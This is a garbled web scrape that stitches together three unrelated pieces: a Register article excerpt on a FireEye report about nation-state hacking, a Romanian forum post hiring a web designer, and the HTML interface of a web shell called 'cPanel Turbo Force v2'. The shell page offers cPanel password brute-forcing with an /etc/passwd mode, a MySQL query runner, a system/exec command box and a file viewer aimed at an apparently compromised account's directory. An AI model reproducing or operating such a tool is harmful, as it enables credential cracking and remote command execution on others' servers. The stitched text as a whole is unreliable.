“False flag operations and the very nature of the internet make tactical attribution a losing game. However, strategic attribution – fusing all sources of intelligence on a potential threat – allows a much higher level of confidence and more options for the decision maker,” Professor Wingfield continued. “And strategic attribution begins and ends with geopolitical analysis." Cyber attacks can be a low-cost, high payoff way to defend national sovereignty and to project national power. According to FireEye, the key characteristics for some of the main regions of the world include: Asia-Pacific: home to large, bureaucratic hacker groups, such as the “Comment Crew” who pursues targets in high-frequency, brute-force attacks. Russia/Eastern Europe: More technically advanced cyberattacks that are often highly effective at evading detection. Middle East: Cybercriminals in the region often using creativity, deception, and social engineering to trick users into compromising their own computers. United States: origin of the most complex, targeted, and rigorously engineered cyber attack campaigns to date, such as the Stuxnet worm. Attackers favour a drone-like approach to malware delivery. FireEye's report goes on to speculate about factors that could change the world’s cyber security landscape in the near to medium term, including a cyber arms treaty that could stem the use of online attacks and about whether privacy concerns from the ongoing Snowden revelations about PRISM might serve to restrain government-sponsored cyber attacks in the US and globally. The net security firm also looks at new actors on the cyberwar stage – most notably Brazil, Poland, and Taiwan. Finally, it considers the possibility that such attacks mights result in outages of critical national infrastructure systems, a long-feared threat over the last 15 years that has thankfully failed to materialise. Squirrels have caused frequent power outages by doing things like chewing through high-tension power cables (or even touching them, to fatal effect for the furry little rodents) but El Reg's security desk hasn't come up with even one verified example where hacking has triggered a blackout – except in the imaginations of Hollywood execs, of course. FireEye's report, titled World War C: Understanding Nation-State Motives Behind Today’s Advanced Cyber Attacks, can be found here (PDF). ® Via: State-backed hackers: You think you're so mysterious, but you're really not – report • The Register

angajez webdesigner pentru un proiect Cerin?e: - cunostinte avansate in html/css/php; - imaginatie. discutam detaliile, /pret/timp de lucru prin mesaj privat accept mesaje doar de la membrii vechi si de incredere

<html> <title>cPanel Turbo Force v2</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <head> <style type="text/css"> <!-- body { background-color: #000000; font-size: 18px; color: #cccccc; } input,textarea,select{ font-weight: bold; color: #cccccc; dashed #ffffff; border: 1px solid #2C2C2C; background-color: #080808 } a { background-color: #151515; vertical-align: bottom; color: #000; text-decoration: none; font-size: 20px; margin: 8px; padding: 6px; border: thin solid #000; } a:hover { background-color: #080808; vertical-align: bottom; color: #333; text-decoration: none; font-size: 20px; margin: 8px; padding: 6px; border: thin solid #000; } .style1 { text-align: center; } .style2 { color: #FFFFFF; font-weight: bold; } .style3 { color: #FFFFFF; } --> </style> </head> <form method="POST" target="_blank"> <strong> <input name="page" type="hidden" value="find"> </strong> <table width="600" border="0" cellpadding="3" cellspacing="1" align="center"> <tr> </tr> <tr> <td> <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"> <td valign="top" bgcolor="#151515" class="style2" style="width: 139px"> <strong>User :</strong></td> <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" class="style2" style="width: 139px"> <strong>Pass :</strong></td> <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" class="style2" style="width: 139px"> <strong>Type :</strong></td> <td valign="top" bgcolor="#151515" colspan="5"> <span class="style2"><strong>Simple : </strong> </span> <strong> <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong> <font class="style2"><strong>/etc/passwd : </strong> </font> <strong> <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong> </strong> </span> </td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"></td> <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start"> </strong> </td> <tr> </form> <td valign="top" colspan="6"><strong></strong></td> <form method="POST" target="_blank"> <strong> <input type="hidden" name="go" value="cmd_mysql"> </strong> <tr> <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD MYSQL</strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td> <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td> <td valign="top" bgcolor="#151515"><strong>pass</strong></td> <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td> <td valign="top" bgcolor="#151515"><strong>database</strong></td> <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;"> <strong>cmd ~</strong></td> <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px"> <strong> <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES; SHOW TABLES user_vb ; SELECT * FROM user; SELECT version(); SELECT user();</textarea></strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td> <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td> </tr> <input name="db" value="MySQL" type="hidden"> <input name="db_server" type="hidden" value="localhost"> <input name="db_port" type="hidden" value="3306"> <input name="cccc" type="hidden" value="db_query"> </form> <tr> <td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td> </tr> <form method="POST" target="_blank"> <tr> <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD system - passthru - exec - shell_exec</strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong>cmd ~</strong></td> <td valign="top" bgcolor="#151515" colspan="5"> <select name="att" dir="rtl" size="1"> <option value="system" selected="">system</option> <option value="passthru">passthru</option> <option value="exec">exec</option> <option value="shell_exec">shell_exec</option> </select> <strong> <input name="page" type="hidden" value="ccmmdd"> <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td> <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="go"></strong></td> </tr> </form> <form method="POST" target="_blank"> <tr> <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Show File And Edit</strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td> <td valign="top" bgcolor="#151515" colspan="5"> <strong> <input name="pathclass" type="text" style="width: 284px" value="/home/alsaain1/public_html/images"></strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td> <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td> </tr> <input name="page" type="hidden" value="show"> </form> <tr> <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info Security</strong></td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td> <td valign="top" bgcolor="#151515" colspan="5"> <strong> OFF </strong> </td> </tr> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Function</strong></td> <td valign="top" bgcolor="#151515" colspan="5"> <strong> <font color=red>php_uname,getmyuid, getmypid,leak,listen,diskfreespace,tmpfile,link,ig nore_user_abord,dl,set_time_limit,passthru,exec,po pen,system,proc_get_status,proc_nice,proc_open,pro c_terminate,proc_close,highlight_file,source,show_ source,fpaththru,virtual,posix_ctermid,posix_getcw d,posix_getegid,posix_geteuid,posix_getgid,posix_g etgrgid,posix_getgrnam,posix_getgroups,posix_getlo gin,posix_getpgid,posix_getpgrp,posix_getpid,posix ,_getppid,posix_getpwnam,posix_getpwuid,posix_getr limit,posix_getsid,posix_getuid,posix_isatty,posix _kill,posix_mkfifo,posix_setegid,posix_seteuid,pos ix_setgid,posix_setpgid,posix_setsid,posix_setuid, posix_times,posix_ttyname,posix_uname,proc_open,pr oc_close,proc_get_status,proc_nice,proc_terminate, phpinfo,shell_exec,escapeshellarg,escapeshellcmd,i ni_alter,show_source,pfsockopen,leak,apache_child_ terminate,posix_setuid,dl,virtual</font></b></strong></td> <tr> <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td> <td valign="top" bgcolor="#151515" colspan="5"><strong></strong></td> </table> </td> </tr> </table> <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html> <form style="border: 0px ridge #FFFFFF"> <p align="center"></td> </tr><div align="center"> <tr> <input type="submit" name="user" value="user"><option value="name"></select> </form> <div align="center"> <table border="5" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="5"> <tr> <td bordercolorlight="#008000" bordercolordark="#006A00"> <p align="left"> <textarea method='POST' rows="25" name="S1" cols="16"> </textarea>

Bine ai venit!